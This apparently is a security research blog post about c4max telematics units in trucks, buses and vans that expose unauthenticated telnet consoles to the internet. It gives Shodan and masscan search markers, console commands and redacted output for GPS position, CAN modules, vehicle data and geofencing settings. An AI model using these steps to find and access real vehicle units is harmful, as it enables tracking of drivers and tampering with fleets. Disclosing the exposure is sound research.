Hacking industrial vehicles from the internet
It is possible to monitor and control float trucks, public bus or delivery vans from the internet, obtaining their speed, position, and a lot other parameters. You can even control some parameters of the vehicle or hack into the canbus of the vehicle remotely.
Those vehicles have a Telematics Gateway Unit (TGU) device and a 3g/4g/gprs/lte/edge/HDSPA modem to connect to the internet, with a public I.P. address.
There are thousands of TGU connected to the internet, with no authentication at all and with administrative interfaces through a web panel or a telnet session.
Finding publicly exposed TGUs in the internets
There are tons of open TGU and similar vehicle appliances on the internet. One very interesting and easy to find is the c4max.
The c4max smartbox is a TGU with powerful capabilities, a simple console on port 23, and is easy to identify while scaning the internet.
A quick search with shodan, reveals 733 open c4max devices on the internet, at the time of scanning. Because of the nature of these devices, connected to the internet using mobile data plans and in industrial vehicles, the devices you can find vary a lot from time to time.
Scanning the internet yourself with masscan finds different industrial vechicles working at different hours.
The c4max can be found looking for port 23, and the banner ‘gps’ or ‘welcome on console’ or similar strings from the telnet console they provide.
An example with shodan:
What can be done inside a c4max TGU
The c4max devices that I found on the internet are not password protected, and there is no security that prevents anyone from connecting to them.
The telnet interface has 3 screns: basic, advanced, and commands.
The basic interface:
The advanced interface:
Some interesting commands:
Basics[C4E]> iostate Input 1 : Disconnected Output 1 : Disconnected Output 2 : Disconnected Alarm : Disconnected Ignition : Connected Basics[C4E]>
Retriving gps coordinates of the vehicle (removed some info from the output, replaced by XXX…):
Basics[C4E]> gpspos Internal antenna GPRMC Frame value is $GPRMC XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX GPGGA Frame value is $GPGGA,XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Basics[C4E]>
And with the gps coordinates, we can locate the vehicle in google maps, for example:
List available modules:
Basics[C4E]> list dbg pdm sql wdg boot dhcpServer sshTunnel serialPPP cpnManager netMonitoring boardsInfo messageBrokerProxy versionManager messageBroker config dnsProxy fileManager dictionary can gps ios usb bootReason batt leds onewire wifi smartCardManager j1587 j1708 j1850 j1939 kline modem nvram usbHfk chronoTachyGraph sensors dtc jvm obd ibutton dataEmitter jbinaryGate ledManager network adminProtocol crashSensor timeZoneManager instantFixII modemOperatorDriver gpsOdometer smartSensors relayControl driverBehavior obdStacks locales fileSync pwrManager gpsMvtDetector geoFencing sensorsCalibration updateManager companionSoftwareClient urlServer gpsEcho binaryGateMonitor sensorsRecorder messageGate binaryGate deadReckoning speedDropControl criticalCommandManager cacheManager update acceleroMvtDetector history commandManager dataRecorder eeprom Basics[C4E]>
The can bus module:
Basics[C4E]> list can com::mdi::drivers::can.activateDebug=0 com::mdi::drivers::can.active_protocols=255 Basics[C4E]>
And with listdb, we can get a lot of information from the vehicle, the company that operates the vehicle, the driver etc, that I will not post here, for obvious reasons, but some of the information form listdb:
... MDI_EXT_BATT_VOLTAGE='12687' MDI_GPS_SPEED='0000090' ...
Basics[C4E]> modem ppp0 XXXXXXXXXXX APN: XXXXXXXXXXX autoAPN: XXXXXXXXXXX Your IMEI is : XXXXXXXXXXX Your IMSI is : XXXXXXXXXXX DNS servers are nameserver XXXXXXXXXXX nameserver XXXXXXXXXXX In case of problem, check your configuration (with "list all" command) Basics[C4E]>
We can even geofence the vehicle (I don’t know what it would cause):
com::mdi::services::geoFencing.periodInMs=5000 com::mdi::services::geoFencing.directory=/mnt/user/writeDir/geofencing com::mdi::services::geoFencing.directory=/mnt/user/data/geofencing com::mdi::services::geoFencing.directory=/mnt/user/mmc/geofencing com::mdi::services::geoFencing.areaModeSearch=0
Telematic Gateway Units exposed to the internet with public addresses and no authentication can be used to remotely track industrial vehicles, geofence them, change the mission route, if you read the schematics of these units:
You can see this device is connected to the bus of the vehicle, to the ignition, to the battery… and the theoretical things that could cause are very scary. Of course, not having one of these available and just testing in the wild is not responsible and of course I will not do it, so I still don’t know how far one can go with access to one of these devices. Caution is advised.
IMPORTANT NOTE: ALL THE INFORMATION CONTAINED IN THIS POST IS INTENDED FOR EDUCATIONAL AND RESEARCH PURPOSES ONLY. MANIPULATING REAL AUTOMOTIVE DEVICES FROM THE INTERNET IS NOT ETHICAL AND COULD BE ILLEGAL UNDER YOUR JURISDICTION. ANY VIEWS OR OPINIONS EXPRESSED IN THIS ARTICLE ARE ONLY MY OPINIONS AND NOT RELATED TO MY EMPLOYER OR ANY ORGANIZATION I BELONG TO. ALL THE INFORMATION PROVIDED IN THIS POST HAS BEEN COLLECTED USING PUBLICLY AVAILABLE RESOURCES, LIKE MANUFACTURER MANUALS AND SPECIALIZED SEARCH ENGINES. IN THE COURSE OF THIS FINDINGS, THE DEVICES DESCRIBED HERE NEVER HAD ANY KIND OF SECURITY IMPLEMENTED TO PREVENT CONNECTIONS TO THE DISCOVERED INTERFACES AND THEIR SECURITY WAS NEVER CIRCUMVENTED OR BYPASSED.